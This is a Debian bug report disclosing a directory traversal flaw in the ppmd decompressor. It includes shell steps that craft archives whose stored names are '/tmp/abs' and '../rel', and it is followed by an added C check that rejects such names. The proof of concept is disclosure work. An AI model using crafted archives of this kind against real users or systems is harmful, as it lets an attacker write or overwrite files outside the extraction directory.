Bug#775218: ppmd: directory traversal vulnerability
Package: ppmd
Version: 10.1-5
Tags: security
ppmd is susceptible to directory traversal vulnerabilities. While
decompressing a file, it will happily use absolute and relative paths
taken from the input. This can be exploited by a malicious compressed
file to write files outside the current directory.
1. Absolute path.
A sample could be prepared in the following way:
$ touch XtmpXabs
$ ppmd e -ftest.pmd XtmpXabs
$ sed -i 's|XtmpXabs|/tmp/abs|g' test.pmd
$ rm XtmpXabs
Then check it works:
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ ppmd d test.pmd
Fast PPMII compressor for textual data, variant J, Apr 19 2012
/tmp/abs: 5 > 1, 40.00 bpb, used: 0.0MB, speed: 1 KB/sec
$ ls /tmp/abs
/tmp/abs
2. Relative path with "..".
A sample could be prepared in the following way:
$ touch XXXrel
$ ppmd e -ftest.pmd XXXrel
$ sed -i 's|XXXrel|../rel|g' test.pmd
$ rm XXXrel
Then check it works:
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ ppmd d test.pmd
Fast PPMII compressor for textual data, variant J, Apr 19 2012
../rel: 5 > 1, 40.00 bpb, used: 0.0MB, speed: 1 KB/sec
$ ls ../rel
../rel
--
Alexander Cherepanov
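
Added example, not part of the original report and not ppmd's own code: one way a decompressor could validate the file name stored in the archive before creating the output file, rejecting both cases shown above. The function name is_safe_member_name is hypothetical, and POSIX '/' separators are assumed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from ppmd): returns true only if a file name
 * taken from an archive header stays below the current directory.
 * It checks the name only; a symlink already present in the extraction
 * directory must be handled separately when the file is opened
 * (for example with O_NOFOLLOW | O_EXCL). */
bool is_safe_member_name(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return false;                 /* empty name */
    if (name[0] == '/')
        return false;                 /* absolute path, e.g. "/tmp/abs" */

    const char *p = name;
    while (*p != '\0') {
        /* Length of the current component (up to the next '/' or the end). */
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return false;             /* ".." component, e.g. "../rel" */
        p += len;
        while (*p == '/')             /* skip one or more separators */
            p++;
    }
    return true;
}

int main(void)
{
    /* Constructed sample names: the two from the report plus benign ones. */
    const char *samples[] = { "/tmp/abs", "../rel", "XXXrel",
                              "dir/file.txt", "a/../../b", "a..b" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s %s\n", samples[i],
               is_safe_member_name(samples[i]) ? "extract" : "REJECT");
    return 0;
}
```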